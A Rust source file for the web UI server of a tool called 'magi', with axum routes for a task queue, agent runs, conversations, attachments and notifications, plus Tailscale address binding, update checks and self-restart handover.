1use std::collections::{HashMap, HashSet};
94use std::convert::Infallible;
95use std::net::{IpAddr, Ipv4Addr, SocketAddr};
96use std::path::{Path as FsPath, PathBuf};
97use std::pin::Pin;
98use std::sync::{Arc, Mutex, MutexGuard, PoisonError};
99use std::time::Duration;
100use tokio::sync::Notify;
101
102use anyhow::{Context, Result};
103use axum::Json;
104use axum::Router;
105use axum::body::Bytes;
106use axum::extract::rejection::JsonRejection;
107use axum::extract::{DefaultBodyLimit, Path, Query, State};
108use axum::http::{HeaderMap, HeaderValue, StatusCode, header};
109use axum::response::sse::{Event, KeepAlive, Sse};
110use axum::response::{IntoResponse, Response};
111use axum::routing::{delete, get, post};
112use jiff::Timestamp;
113use serde::{Deserialize, Serialize};
114use tokio_stream::StreamExt as _;
115use tokio_stream::wrappers::ReceiverStream;
116
117use crate::ask::{Answer, Question, Questions};
118use crate::config::{Config, Update, UpdateMode};
119use crate::md;
120use crate::notices::{Notice, Notices};
121use crate::proc::Quiet as _;
122use crate::queue::{Queue, Task, title_from};
123use crate::run::{RunState, RunStatus};
124use crate::talk::{Talk, Talks};
125use crate::{daemon, git, report, repos, run, talk, updater};
126
127pub const DEFAULT_PORT: u16 = 7878;
129
130const POLL: Duration = Duration::from_secs(1);
132
133const KEEPALIVE: Duration = Duration::from_secs(15);
137
138const UPDATE_RECHECK_POLL_MAX: Duration = Duration::from_secs(15 * 60);
149
150const UPDATE_RECHECK_POLL_MIN: Duration = Duration::from_secs(30);
153
154const LIST_DEFAULT: usize = 50;
158const LIST_MAX: usize = 500;
160
161const TITLE_MAX: usize = 72;
163
164const ATTACHMENT_MAX_BYTES: usize = 10 * 1024 * 1024;
173
174const ATTACHMENT_MIME_WHITELIST: [&str; 4] = ["image/png", "image/jpeg", "image/gif", "image/webp"];
180
181const FILENAME_HEADER: &str = "x-filename";
185
186const PANEL_CSP: &str = "default-src 'none'; img-src 'self' data:; style-src 'unsafe-inline'; \
209 font-src data:; base-uri 'none'; form-action 'none'; \
210 frame-ancestors 'self'";
211
212const INDEX_HTML: &str = include_str!("../assets/ui/index.html");
213const APP_CSS: &str = include_str!("../assets/ui/app.css");
214const APP_JS: &str = include_str!("../assets/ui/app.js");
215
216#[derive(Debug, Clone, Copy, PartialEq, Eq)]
218pub enum Bind {
219 Auto,
221 Addr(IpAddr),
223}
224
225impl std::str::FromStr for Bind {
226 type Err = String;
227
228 fn from_str(s: &str) -> std::result::Result<Self, Self::Err> {
232 if s.eq_ignore_ascii_case("auto") {
233 return Ok(Self::Auto);
234 }
235 s.parse()
236 .map(Self::Addr)
237 .map_err(|_| format!("expected `auto` or an IP address, got `{s}`"))
238 }
239}
240
241impl std::fmt::Display for Bind {
242 fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
243 match self {
244 Self::Auto => f.write_str("auto"),
245 Self::Addr(addr) => write!(f, "{addr}"),
246 }
247 }
248}
249
250#[derive(Debug, Clone)]
252pub struct Opts {
253 pub bind: Bind,
255 pub port: u16,
257 pub repo: PathBuf,
259 pub open: bool,
262 pub merge: Option<String>,
270}
271
272impl Default for Opts {
273 fn default() -> Self {
274 Self {
275 bind: Bind::Auto,
276 port: DEFAULT_PORT,
277 repo: PathBuf::from("."),
278 open: false,
279 merge: None,
280 }
281 }
282}
283
284#[derive(Debug, Clone)]
290pub struct Ui {
291 queue: Queue,
292 questions: Questions,
293 notices: Notices,
296 talks: Talks,
297 runs: PathBuf,
298 home: PathBuf,
299 repo: PathBuf,
300 worktrees_root: PathBuf,
307 talk_turns: Arc<Mutex<TalkTurns>>,
315 resuming: Arc<Mutex<HashSet<String>>>,
323 repos_cache: repos::Cache,
327 merge: Option<String>,
329 looping: Arc<Mutex<LoopState>>,
331 launch: Launch,
343 #[cfg(test)]
346 busy_queue_gate: Arc<Mutex<Option<BusyQueueGate>>>,
347}
348
349#[cfg(test)]
369struct BusyQueueGate {
370 reached: tokio::sync::oneshot::Sender<()>,
371 release: std::sync::mpsc::Receiver<()>,
372}
373
374#[cfg(test)]
375impl std::fmt::Debug for BusyQueueGate {
376 fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
377 f.debug_struct("BusyQueueGate").finish_non_exhaustive()
378 }
379}
380
381impl Ui {
382 pub fn new(
384 queue: Queue,
385 questions: Questions,
386 talks: Talks,
387 runs: PathBuf,
388 home: PathBuf,
389 repo: PathBuf,
390 ) -> Self {
391 Self {
392 queue,
393 questions,
394 notices: Notices::at(home.join("notifications")),
395 talks,
396 runs,
397 home,
398 repo,
399 worktrees_root: run::default_worktree_root(),
403 talk_turns: Arc::default(),
404 resuming: Arc::default(),
405 repos_cache: repos::Cache::new(),
406 merge: None,
407 looping: Arc::default(),
408 launch: launch_daemon,
409 #[cfg(test)]
410 busy_queue_gate: Arc::default(),
411 }
412 }
413
414 pub fn open(repo: PathBuf) -> Self {
417 Self::new(
418 Queue::open(),
419 Questions::open(),
420 Talks::open(),
421 run::runs_root(),
422 run::home(),
423 repo,
424 )
425 }
426
427 #[must_use]
434 pub fn with_merge(mut self, merge: Option<String>) -> Self {
435 self.merge = merge;
436 self
437 }
438
439 #[must_use]
444 pub fn with_worktrees_root(mut self, root: PathBuf) -> Self {
445 self.worktrees_root = root;
446 self
447 }
448
449 #[cfg(test)]
454 #[must_use]
455 fn with_launch(mut self, launch: Launch) -> Self {
456 self.launch = launch;
457 self
458 }
459
460 #[cfg(test)]
470 fn set_busy_queue_gate(&self, gate: BusyQueueGate) {
471 *self
472 .busy_queue_gate
473 .lock()
474 .unwrap_or_else(PoisonError::into_inner) = Some(gate);
475 }
476
477 fn looping(&self) -> Arc<Mutex<LoopState>> {
479 Arc::clone(&self.looping)
480 }
481
482 fn start_loop(&self, foreign: Option<Foreign>) -> ApiResult<()> {
489 if let Some(other) = foreign {
490 return Err(ApiError::conflict(format!(
491 "{} is already running the loop, so this one will not start a \
492 second: two loops on one queue race for the same claims and \
493 burn the agent quota twice over. Stop it where it was \
494 started.",
495 other.who()
496 )));
497 }
498 let mut state = self.lock_loop();
499 if state.live.as_ref().is_some_and(Live::alive) {
500 return Err(ApiError::conflict(format!(
501 "this magi web process (pid {}) is already running the loop",
502 std::process::id()
503 )));
504 }
505
506 let stop = daemon::Stop::new();
507 let opts = daemon::Opts {
511 repo: self.repo.clone(),
512 merge: self.merge.clone(),
513 worktrees_root: Some(self.worktrees_root.clone()),
520 ..daemon::Opts::default()
521 };
522 let launch = self.launch;
523 let looping = Arc::clone(&self.looping);
524 let handle = tokio::spawn({
525 let opts = opts.clone();
526 let stop = stop.clone();
527 async move {
528 let failure = match launch(opts, stop).await {
529 Ok(()) => None,
530 Err(e) => Some(format!("{e:#}")),
531 };
532 match &failure {
533 Some(why) => tracing::error!("the loop stopped: {why}"),
534 None => tracing::info!("the loop stopped"),
535 }
536 let mut state = lock_or_recover(&looping);
542 state.live = None;
543 state.last_error = failure;
544 state.rev += 1;
545 }
546 });
547 tracing::info!(
548 "the loop is now running in this process: repo {}, merge {}",
549 opts.repo.display(),
550 opts.merge.as_deref().unwrap_or("as the config says")
551 );
552 state.live = Some(Live { stop, handle, opts });
553 state.last_error = None;
556 state.rev += 1;
557 Ok(())
558 }
559
560 fn stop_loop(&self, foreign: Option<Foreign>, park: bool) -> ApiResult<()> {
566 if let Some(other) = foreign {
567 return Err(ApiError::conflict(format!(
568 "the loop belongs to {}, and this process cannot stop it - \
569 stop it where it was started. A button that silently did \
570 nothing would be worse than this refusal.",
571 other.who()
572 )));
573 }
574 let mut state = self.lock_loop();
575 let Some(live) = state.live.as_ref() else {
576 return Ok(());
577 };
578 if live.stop.stopped() && (!park || live.stop.parking()) {
582 return Ok(());
583 }
584 if park {
585 live.stop.park();
586 tracing::info!("the loop was asked to park; the run stops at its next node boundary");
587 } else {
588 live.stop.stop();
589 tracing::info!("the loop was asked to stop; a run in flight is finished first");
590 }
591 state.rev += 1;
592 Ok(())
593 }
594
595 fn loop_view(&self, reading: Option<daemon::Reading>) -> LoopView {
602 let state = self.lock_loop();
603 let live = state.live.as_ref().filter(|live| live.alive());
606 LoopView {
607 running: live.is_some(),
608 stopping: live.is_some_and(|live| live.stop.finishing()),
609 parking: live.is_some_and(|live| live.stop.parking()),
610 owned: live.is_some(),
611 repo: live
612 .map_or(&self.repo, |live| &live.opts.repo)
613 .display()
614 .to_string(),
615 merge: live.map_or_else(|| self.merge.clone(), |live| live.opts.merge.clone()),
616 last_error: state.last_error.clone(),
617 daemon: DaemonView::of(reading),
618 }
619 }
620
621 fn lock_loop(&self) -> MutexGuard<'_, LoopState> {
623 lock_or_recover(&self.looping)
624 }
625
626 fn is_thinking(&self, id: &str) -> bool {
632 self.talk_turns
633 .lock()
634 .is_ok_and(|turns| turns.live.contains(id))
635 }
636
637 fn begin_talk_turn(&self, id: &str) -> ApiResult<Option<TalkTurnGuard>> {
656 self.claim_talk_turn(id, false)
657 }
658
659 fn begin_queued_talk_turn(&self, id: &str) -> ApiResult<Option<TalkTurnGuard>> {
662 self.claim_talk_turn(id, true)
663 }
664
665 fn claim_talk_turn(&self, id: &str, queued: bool) -> ApiResult<Option<TalkTurnGuard>> {
666 let mut live = self
667 .talk_turns
668 .lock()
669 .map_err(|_| ApiError::internal("the talk turn lock was poisoned"))?;
670 if !live.live.insert(id.to_owned()) {
671 if queued {
672 *live.queued.entry(id.to_owned()).or_default() += 1;
677 }
678 return Ok(None);
679 }
680 Ok(Some(TalkTurnGuard {
681 talk: id.to_owned(),
682 turns: Arc::clone(&self.talk_turns),
683 released: false,
684 }))
685 }
686
687 fn begin_talk_turn_unless_pending(&self, id: &str) -> ApiResult<TalkTurnStart> {
692 let mut live = self
693 .talk_turns
694 .lock()
695 .map_err(|_| ApiError::internal("the talk turn lock was poisoned"))?;
696 if live.live.contains(id) {
697 return Ok(TalkTurnStart::Busy);
698 }
699 let talk = self.talks.get(id).map_err(ApiError::from)?;
700 if !talk.pending.is_empty() || !talk.pending_attachments.is_empty() {
701 return Ok(TalkTurnStart::Pending);
702 }
703 live.live.insert(id.to_owned());
704 Ok(TalkTurnStart::Claimed(TalkTurnGuard {
705 talk: id.to_owned(),
706 turns: Arc::clone(&self.talk_turns),
707 released: false,
708 }))
709 }
710
711 fn park_for_upgrade(&self) -> ApiResult<Option<String>> {
718 let parking = {
719 let mut state = self.lock_loop();
720 let Some(live) = state.live.as_ref() else {
721 return Ok(None);
722 };
723 let busy = live.stop.busy_now();
724 live.stop.park();
725 state.rev += 1;
726 busy
727 };
728 Ok(if parking {
729 daemon::current_work(&self.home, jiff::Timestamp::now())
734 .into_iter()
735 .next()
736 .map(|c| c.run)
737 } else {
738 None
739 })
740 }
741
742 fn begin_resume(&self, id: &str) -> ApiResult<ResumeGuard> {
746 let mut live = self
747 .resuming
748 .lock()
749 .map_err(|_| ApiError::internal("the resume lock was poisoned"))?;
750 if !live.insert(id.to_owned()) {
751 return Err(ApiError::conflict(format!(
752 "run {id} is already being resumed"
753 )));
754 }
755 Ok(ResumeGuard {
756 run: id.to_owned(),
757 resuming: Arc::clone(&self.resuming),
758 })
759 }
760
761 pub fn router(self) -> Router {
769 Router::new()
770 .route("/", get(index))
771 .route("/app.css", get(app_css))
772 .route("/app.js", get(app_js))
773 .route("/api/health", get(health))
774 .route("/api/loop", get(loop_get).post(loop_post))
775 .route("/api/upgrade", post(upgrade_post))
776 .route("/api/runs", get(runs_list))
777 .route("/api/runs/{id}", get(run_detail).delete(run_delete))
778 .route("/api/runs/{id}/report", get(run_report))
779 .route("/api/runs/{id}/fold", post(run_fold))
780 .route("/api/runs/{id}/resume", post(run_resume))
781 .route("/api/queue", get(queue_list))
782 .route("/api/queue/{id}", delete(queue_delete))
783 .route("/api/repos", get(repos_list))
784 .route("/api/queue/{id}/hold", post(queue_hold))
785 .route("/api/queue/{id}/release", post(queue_release))
786 .route("/api/queue/{id}/priority", post(queue_priority))
787 .route("/api/queue/{id}/edit", post(queue_edit))
788 .route("/api/queue/{id}/done", post(queue_done))
789 .route("/api/questions", get(questions_list))
790 .route("/api/questions/{id}/answer", post(question_answer))
791 .route("/api/questions/{id}/say", post(question_say))
792 .route("/api/questions/{id}/panel", get(question_panel))
793 .route("/api/questions/{id}/panel/index.html", get(question_panel))
801 .route("/api/questions/{id}/panel/{name}", get(question_asset))
802 .route("/api/questions/{id}/asset/{name}", get(question_asset))
803 .route("/api/notifications", get(notifications_list))
804 .route("/api/notifications/read-all", post(notifications_read_all))
805 .route("/api/notifications/{id}/read", post(notification_read))
806 .route(
807 "/api/notifications/{id}/dismiss",
808 post(notification_dismiss),
809 )
810 .route("/api/talks", get(talks_list).post(talk_post))
811 .route("/api/talks/{id}", get(talk_detail).delete(talk_delete))
812 .route("/api/talks/{id}/say", post(talk_say))
813 .route("/api/talks/{id}/pending/resume", post(talk_pending_resume))
814 .route("/api/talks/{id}/pending/clear", post(talk_pending_clear))
815 .route("/api/talks/{id}/pending/edit", post(talk_pending_edit))
816 .route("/api/talks/{id}/close", post(talk_close))
817 .route("/api/talks/{id}/reopen", post(talk_reopen))
818 .route(
824 "/api/talks/{id}/attachments",
825 post(talk_attachment_post).layer(DefaultBodyLimit::max(ATTACHMENT_MAX_BYTES + 1)),
826 )
827 .route(
828 "/api/talks/{id}/attachments/{att}",
829 get(talk_attachment_get),
830 )
831 .route("/api/events", get(events))
832 .with_state(Arc::new(self))
833 }
834}
835
836#[derive(Debug)]
842struct TalkTurnGuard {
843 talk: String,
844 turns: Arc<Mutex<TalkTurns>>,
845 released: bool,
846}
847
848#[derive(Debug, Default)]
855struct TalkTurns {
856 live: HashSet<String>,
857 queued: HashMap<String, u64>,
858}
859
860enum TalkTurnStart {
863 Claimed(TalkTurnGuard),
864 Busy,
865 Pending,
866}
867
868impl TalkTurnGuard {
869 fn release(mut self, live: &mut TalkTurns) {
872 live.live.remove(&self.talk);
873 live.queued.remove(&self.talk);
874 self.released = true;
875 }
876}
877
878impl Drop for TalkTurnGuard {
879 fn drop(&mut self) {
880 if self.released {
881 return;
882 }
883 if let Ok(mut live) = self.turns.lock() {
884 live.live.remove(&self.talk);
885 live.queued.remove(&self.talk);
886 }
887 }
888}
889
890struct ResumeGuard {
892 run: String,
893 resuming: Arc<Mutex<HashSet<String>>>,
894}
895
896impl Drop for ResumeGuard {
897 fn drop(&mut self) {
898 if let Ok(mut live) = self.resuming.lock() {
899 live.remove(&self.run);
900 }
901 }
902}
903
904async fn bind_waiting(socket: SocketAddr) -> Result<tokio::net::TcpListener> {
914 const WINDOW: Duration = Duration::from_secs(10);
915 const GAP: Duration = Duration::from_millis(250);
916
917 let deadline = std::time::Instant::now() + WINDOW;
918 let mut said = false;
919 loop {
920 match tokio::net::TcpListener::bind(socket).await {
921 Ok(listener) => return Ok(listener),
922 Err(e)
923 if e.kind() == std::io::ErrorKind::AddrInUse
924 && std::time::Instant::now() < deadline =>
925 {
926 if !said {
927 said = true;
928 tracing::info!(
929 "{socket} is still held - waiting up to {}s for it, \
930 which is what a restart looks like from here",
931 WINDOW.as_secs()
932 );
933 }
934 tokio::time::sleep(GAP).await;
935 }
936 Err(e) => return Err(e).with_context(|| format!("bind {socket}")),
937 }
938 }
939}
940
941static HANDOVER: std::sync::LazyLock<Notify> = std::sync::LazyLock::new(Notify::new);
944
945fn spawn_successor() -> Result<()> {
957 let exe = std::env::current_exe().context("find this binary")?;
958 let args: Vec<String> = std::env::args().skip(1).collect();
959 tracing::info!("restarting: {} {}", exe.display(), args.join(" "));
960
961 let mut cmd = std::process::Command::new(&exe);
962 cmd.args(&args)
963 .stdin(std::process::Stdio::null())
964 .stdout(std::process::Stdio::null())
965 .stderr(std::process::Stdio::null());
966 #[cfg(windows)]
967 {
968 use std::os::windows::process::CommandExt as _;
969 cmd.creation_flags(0x0000_0008 | 0x0000_0200);
972 }
973 cmd.spawn().context("start the successor")?;
974 Ok(())
975}
976
977pub async fn serve(opts: Opts) -> Result<()> {
1002 let (addr, warning) = resolve_bind(&opts.bind);
1003 if let Some(warning) = warning {
1004 tracing::warn!("{warning}");
1005 }
1006
1007 report::set_color(false);
1013
1014 let repo = normalize_default_repo(opts.repo).await;
1015 let ui = Ui::open(repo).with_merge(opts.merge);
1016 let home = ui.home.clone();
1021 let repo = ui.repo.clone();
1022 updater::reconcile_after_restart(&home);
1027 tokio::spawn(run_update_recheck(repo, home.clone()));
1036 let looping = ui.looping();
1037 let socket = SocketAddr::new(addr, opts.port);
1038 let listener = bind_waiting(socket).await?;
1039 let url = format!("http://{addr}:{}", opts.port);
1040 tracing::info!(
1041 "magi web UI on {url} - there is no authentication, so anyone who can \
1042 reach this address can file and hold tasks: the tailnet is the \
1043 security boundary"
1044 );
1045 tracing::info!(
1046 "the queue loop is not running yet - start it from the UI, which is \
1047 the whole reason this process can: nothing in the queue moves until \
1048 something is running the loop"
1049 );
1050 if opts.open {
1051 println!("{url}");
1055 }
1056
1057 let mut served = tokio::spawn(axum::serve(listener, ui.router()).into_future());
1060 let interrupted = async {
1061 if tokio::signal::ctrl_c().await.is_err() {
1062 std::future::pending::<()>().await;
1067 }
1068 };
1069 let handover = HANDOVER.notified();
1070 tokio::select! {
1071 joined = &mut served => match joined {
1072 Ok(outcome) => outcome.context("serve the web UI"),
1073 Err(e) => Err(e).context("the task serving the web UI ended"),
1074 },
1075 () = interrupted => {
1076 tracing::info!("shutting down the web UI");
1077 finish_loop(&looping).await;
1078 Ok(())
1079 }
1080 () = handover => {
1081 tracing::info!("upgraded - handing this address to the successor");
1082 hand_over(&home, &looping, served, spawn_successor).await
1083 }
1084 }
1085}
1086
1087async fn normalize_default_repo(repo: PathBuf) -> PathBuf {
1108 if repo != FsPath::new(".") {
1109 return repo;
1110 }
1111 let Ok(canonical) = repo.canonicalize() else {
1112 return repo;
1113 };
1114 if git::toplevel(&canonical).await.is_ok() {
1115 return repo;
1116 }
1117 let Some(home) = dirs::home_dir() else {
1118 return repo;
1119 };
1120 match repos::discover_verified(&home, &[], None, updater::repo_name()).await {
1121 Some(found) => {
1122 tracing::info!(
1123 "the default --repo `.` ({}) is not a git checkout; using {} instead - {}",
1124 canonical.display(),
1125 found.path.display(),
1126 found.reason,
1127 );
1128 found.path
1129 }
1130 None => repo,
1131 }
1132}
1133
1134async fn hand_over(
1164 home: &FsPath,
1165 looping: &Mutex<LoopState>,
1166 served: tokio::task::JoinHandle<std::io::Result<()>>,
1167 successor: impl FnOnce() -> Result<()>,
1168) -> Result<()> {
1169 if let Some(mut progress) = updater::read_progress(home) {
1170 progress.advance(updater::Stage::Parking);
1171 let _ = updater::write_progress(home, &progress);
1172 }
1173 finish_loop(looping).await;
1174 served.abort();
1175 let _ = served.await;
1176 if let Some(mut progress) = updater::read_progress(home) {
1177 progress.advance(updater::Stage::Restarting);
1178 let _ = updater::write_progress(home, &progress);
1179 }
1180 successor()
1181}
1182
1183async fn finish_loop(state: &Mutex<LoopState>) {
1190 let live = lock_or_recover(state).live.take();
1191 let Some(live) = live else { return };
1192 live.stop.stop();
1193 lock_or_recover(state).rev += 1;
1194 tracing::info!("waiting for the loop to finish the run in flight");
1195 let _ = live.handle.await;
1198}
1199
1200pub fn resolve_bind(bind: &Bind) -> (IpAddr, Option<String>) {
1206 match bind {
1207 Bind::Addr(addr) => (*addr, None),
1208 Bind::Auto => match tailscale_ip() {
1209 Ok(ip) => (IpAddr::V4(ip), None),
1210 Err(why) => (
1211 IpAddr::V4(Ipv4Addr::LOCALHOST),
1212 Some(format!(
1213 "--bind auto fell back to 127.0.0.1: {why}. The UI is \
1214 local-only and a phone cannot reach it; start Tailscale \
1215 or pass --bind <addr>"
1216 )),
1217 ),
1218 },
1219 }
1220}
1221
1222fn tailscale_ip() -> std::result::Result<Ipv4Addr, String> {
1230 let out = std::process::Command::new("tailscale")
1231 .args(["ip", "-4"])
1232 .quiet()
1233 .output()
1234 .map_err(|e| format!("could not run `tailscale ip -4` ({e})"))?;
1235 if !out.status.success() {
1236 let why = String::from_utf8_lossy(&out.stderr);
1237 let why = why.trim();
1238 return Err(format!(
1239 "`tailscale ip -4` failed ({}){}",
1240 out.status,
1241 if why.is_empty() {
1242 String::new()
1243 } else {
1244 format!(": {why}")
1245 }
1246 ));
1247 }
1248 String::from_utf8_lossy(&out.stdout)
1249 .lines()
1250 .filter_map(|line| line.trim().parse::<Ipv4Addr>().ok())
1251 .find(is_tailnet)
1252 .ok_or_else(|| "`tailscale ip -4` printed no address in 100.64.0.0/10".to_owned())
1253}
1254
1255fn is_tailnet(ip: &Ipv4Addr) -> bool {
1257 let o = ip.octets();
1258 o[0] == 100 && (64..=127).contains(&o[1])
1259}
1260
1261type ApiResult<T> = std::result::Result<T, ApiError>;
1265
1266#[derive(Debug)]
1268struct ApiError {
1269 status: StatusCode,
1270 message: String,
1271}
1272
1273impl ApiError {
1274 fn bad_request(message: impl Into<String>) -> Self {
1276 Self {
1277 status: StatusCode::BAD_REQUEST,
1278 message: message.into(),
1279 }
1280 }
1281
1282 fn not_found(message: impl Into<String>) -> Self {
1284 Self {
1285 status: StatusCode::NOT_FOUND,
1286 message: message.into(),
1287 }
1288 }
1289
1290 fn with_status(mut self, status: StatusCode) -> Self {
1293 self.status = status;
1294 self
1295 }
1296
1297 fn bad_request_from(e: anyhow::Error) -> Self {
1301 Self::bad_request(format!("{e:#}"))
1302 }
1303
1304 fn conflict(message: impl Into<String>) -> Self {
1305 Self {
1306 status: StatusCode::CONFLICT,
1307 message: message.into(),
1308 }
1309 }
1310
1311 fn internal(message: impl Into<String>) -> Self {
1313 Self {
1314 status: StatusCode::INTERNAL_SERVER_ERROR,
1315 message: message.into(),
1316 }
1317 }
1318}
1319
1320impl From<anyhow::Error> for ApiError {
1321 fn from(e: anyhow::Error) -> Self {
1326 Self::internal(format!("{e:#}"))
1327 }
1328}
1329
1330impl IntoResponse for ApiError {
1331 fn into_response(self) -> Response {
1332 let body = serde_json::json!({ "error": self.message });
1333 (self.status, Json(body)).into_response()
1334 }
1335}
1336
1337async fn blocking<T>(job: impl FnOnce() -> ApiResult<T> + Send + 'static) -> ApiResult<T>
1346where
1347 T: Send + 'static,
1348{
1349 match tokio::task::spawn_blocking(job).await {
1350 Ok(result) => result,
1351 Err(e) => Err(ApiError::internal(format!("filesystem task failed: {e}"))),
1352 }
1353}
1354
1355const ASSET_CACHE: &str = "no-cache, must-revalidate";
1373
1374fn asset_etag() -> &'static str {
1381 static TAG: std::sync::LazyLock<String> = std::sync::LazyLock::new(|| {
1382 format!(
1383 "\"{}-{}\"",
1384 env!("CARGO_PKG_VERSION"),
1385 INDEX_HTML.len() + APP_CSS.len() + APP_JS.len()
1390 )
1391 });
1392 &TAG
1393}
1394
1395fn asset_headers(mime: &'static str) -> [(header::HeaderName, &'static str); 3] {
1397 [
1398 (header::CONTENT_TYPE, mime),
1399 (header::CACHE_CONTROL, ASSET_CACHE),
1400 (header::ETAG, asset_etag()),
1401 ]
1402}
1403
1404fn asset(headers: &header::HeaderMap, mime: &'static str, body: &'static str) -> Response {
1412 let tag = asset_etag();
1413 let known = headers
1414 .get(header::IF_NONE_MATCH)
1415 .and_then(|v| v.to_str().ok())
1416 .is_some_and(|sent| sent.split(',').any(|one| one.trim().ends_with(tag)));
1420 if known {
1421 return (StatusCode::NOT_MODIFIED, asset_headers(mime)).into_response();
1422 }
1423 (asset_headers(mime), body).into_response()
1424}
1425
1426async fn index(headers: header::HeaderMap) -> Response {
1427 asset(&headers, "text/html; charset=utf-8", INDEX_HTML)
1428}
1429
1430async fn app_css(headers: header::HeaderMap) -> Response {
1431 asset(&headers, "text/css; charset=utf-8", APP_CSS)
1432}
1433
1434async fn app_js(headers: header::HeaderMap) -> Response {
1435 asset(&headers, "text/javascript; charset=utf-8", APP_JS)
1436}
1437
1438#[derive(Debug, Serialize)]
1440struct HealthView {
1441 version: &'static str,
1442 home: String,
1443 queue_rev: u64,
1444 runs_rev: u64,
1445 questions_rev: u64,
1457 talks_rev: u64,
1459 notifications_rev: u64,
1461 notifications_unread: usize,
1464 loop_rev: u64,
1469 runs_unreadable: usize,
1477 disk: DiskView,
1485 questions_open: usize,
1491 questions_needs_owner: usize,
1501 daemon: DaemonView,
1502 #[serde(rename = "loop")]
1508 looping: LoopView,
1509 update: UpdateView,
1516 upgrade: Option<UpgradeProgressView>,
1520}
1521
1522#[derive(Debug, Serialize)]
1529struct UpdateView {
1530 available: bool,
1532 to: Option<String>,
1534}
1535
1536#[derive(Debug, Serialize)]
1538struct UpgradeProgressView {
1539 stage: updater::Stage,
1540 from: String,
1541 to: Option<String>,
1542 waiting_on: Option<String>,
1545 started_at: Timestamp,
1546 updated_at: Timestamp,
1547 detail: Option<String>,
1548}
1549
1550fn should_spawn_recheck(cfg: &Update) -> bool {
1557 cfg.mode != UpdateMode::Off && !updater::disabled_by_env()
1558}
1559
1560fn update_recheck_due(checker: &updater::Checker, progress: Option<&updater::Progress>) -> bool {
1572 if progress.is_some_and(|p| !p.stage.terminal()) {
1573 return false;
1574 }
1575 checker.should_check()
1576}
1577
1578fn recheck_poll_period(cfg: &Update) -> Duration {
1591 (updater::effective_interval(cfg) / 8).clamp(UPDATE_RECHECK_POLL_MIN, UPDATE_RECHECK_POLL_MAX)
1592}
1593
1594async fn run_update_recheck(repo: PathBuf, home: PathBuf) {
1618 loop {
1619 let (cfg, _) = Config::discover(&repo, None).unwrap_or_default();
1620 tokio::time::sleep(recheck_poll_period(&cfg.update)).await;
1621 if !should_spawn_recheck(&cfg.update) {
1622 continue;
1623 }
1624 let Some(checker) = updater::Checker::new(&cfg.update) else {
1625 continue;
1626 };
1627 let progress = updater::read_progress(&home);
1628 if !update_recheck_due(&checker, progress.as_ref()) {
1629 continue;
1630 }
1631 if let Err(e) = checker.newer_release().await {
1632 tracing::warn!("background update recheck failed: {e:#}");
1633 }
1634 }
1635}
1636
1637fn cached_update_view(repo: &FsPath) -> UpdateView {
1643 let (cfg, _) = Config::discover(repo, None).unwrap_or_default();
1644 let latest = updater::Checker::new(&cfg.update).and_then(|c| c.cached_update());
1645 match latest {
1646 Some(latest) => UpdateView {
1647 available: true,
1648 to: Some(latest.tag_name),
1649 },
1650 None => UpdateView {
1651 available: false,
1652 to: None,
1653 },
1654 }
1655}
1656
1657fn upgrade_progress_view(ui: &Ui, progress: updater::Progress) -> UpgradeProgressView {
1663 let waiting_on = (progress.stage == updater::Stage::Parking)
1664 .then_some(progress.parked_run.as_deref())
1665 .flatten()
1666 .and_then(|id| read_run(&ui.runs, id).ok())
1667 .map(|run| {
1668 format!(
1669 "run {} is finishing {} before the address is handed over",
1670 run.short(),
1671 run.status.as_str()
1672 )
1673 });
1674 UpgradeProgressView {
1675 stage: progress.stage,
1676 from: progress.from,
1677 to: progress.to,
1678 waiting_on,
1679 started_at: progress.started_at,
1680 updated_at: progress.updated_at,
1681 detail: progress.detail,
1682 }
1683}
1684
1685#[derive(Debug, Serialize)]
1690struct DiskView {
1691 #[serde(skip_serializing_if = "Option::is_none")]
1693 free_bytes: Option<u64>,
1694 runs_bytes: u64,
1696 worktrees_bytes: u64,
1698 #[serde(skip_serializing_if = "Option::is_none")]
1700 cache_bytes: Option<u64>,
1701}
1702
1703impl DiskView {
1704 fn of(ui: &Ui) -> Self {
1706 let cache_bytes = Config::discover(&ui.repo, None)
1707 .ok()
1708 .and_then(|(cfg, _)| cfg.cache_dir())
1709 .map(|dir| crate::disk::dir_size(&dir));
1710 Self {
1711 free_bytes: crate::disk::free_bytes(&ui.runs).ok(),
1712 runs_bytes: crate::disk::dir_size(&ui.runs),
1713 worktrees_bytes: crate::disk::dir_size(&ui.worktrees_root),
1714 cache_bytes,
1715 }
1716 }
1717}
1718
1719#[derive(Debug, Serialize)]
1721struct DaemonView {
1722 running: bool,
1723 idle: Option<bool>,
1724 pid: Option<u32>,
1725 current: Vec<daemon::Current>,
1729 completed: Option<u64>,
1730 stale_for_secs: Option<i64>,
1731}
1732
1733impl DaemonView {
1734 fn of(status: Option<daemon::Reading>) -> Self {
1738 let Some(status) = status else {
1739 return Self {
1740 running: false,
1741 idle: None,
1742 pid: None,
1743 current: Vec::new(),
1744 completed: None,
1745 stale_for_secs: None,
1746 };
1747 };
1748 let now = Timestamp::now();
1749 let age = status.age_secs(now);
1750 Self {
1751 running: status.running(now),
1752 idle: Some(status.idle),
1753 pid: status.pid,
1754 current: status.current,
1755 completed: Some(status.completed),
1756 stale_for_secs: age,
1757 }
1758 }
1759}
1760
1761async fn health(State(ui): State<Arc<Ui>>) -> ApiResult<Json<HealthView>> {
1762 blocking(move || {
1763 let reading = daemon::read_status(&ui.home);
1767 let loop_rev = ui.lock_loop().rev;
1771 let update = cached_update_view(&ui.repo);
1772 let upgrade = updater::read_progress(&ui.home).map(|p| upgrade_progress_view(&ui, p));
1773 Ok(Json(HealthView {
1774 version: env!("CARGO_PKG_VERSION"),
1775 home: ui.home.display().to_string(),
1776 queue_rev: ui.queue.revision(),
1777 runs_rev: runs_revision(&ui.runs),
1778 questions_rev: ui.questions.revision(),
1779 talks_rev: ui.talks.revision(),
1780 notifications_rev: ui.notices.revision(),
1781 notifications_unread: ui.notices.count_unread(),
1782 loop_rev,
1783 runs_unreadable: runs_unreadable(&ui.runs),
1784 questions_open: ui.questions.count_open(),
1785 questions_needs_owner: ui.questions.count_needs_owner(),
1786 daemon: DaemonView::of(reading.clone()),
1787 looping: ui.loop_view(reading),
1788 disk: DiskView::of(&ui),
1789 update,
1790 upgrade,
1791 }))
1792 })
1793 .await
1794}
1795
1796#[derive(Debug, Serialize)]
1798struct LoopView {
1799 running: bool,
1801 stopping: bool,
1809 parking: bool,
1817 owned: bool,
1825 repo: String,
1828 merge: Option<String>,
1831 last_error: Option<String>,
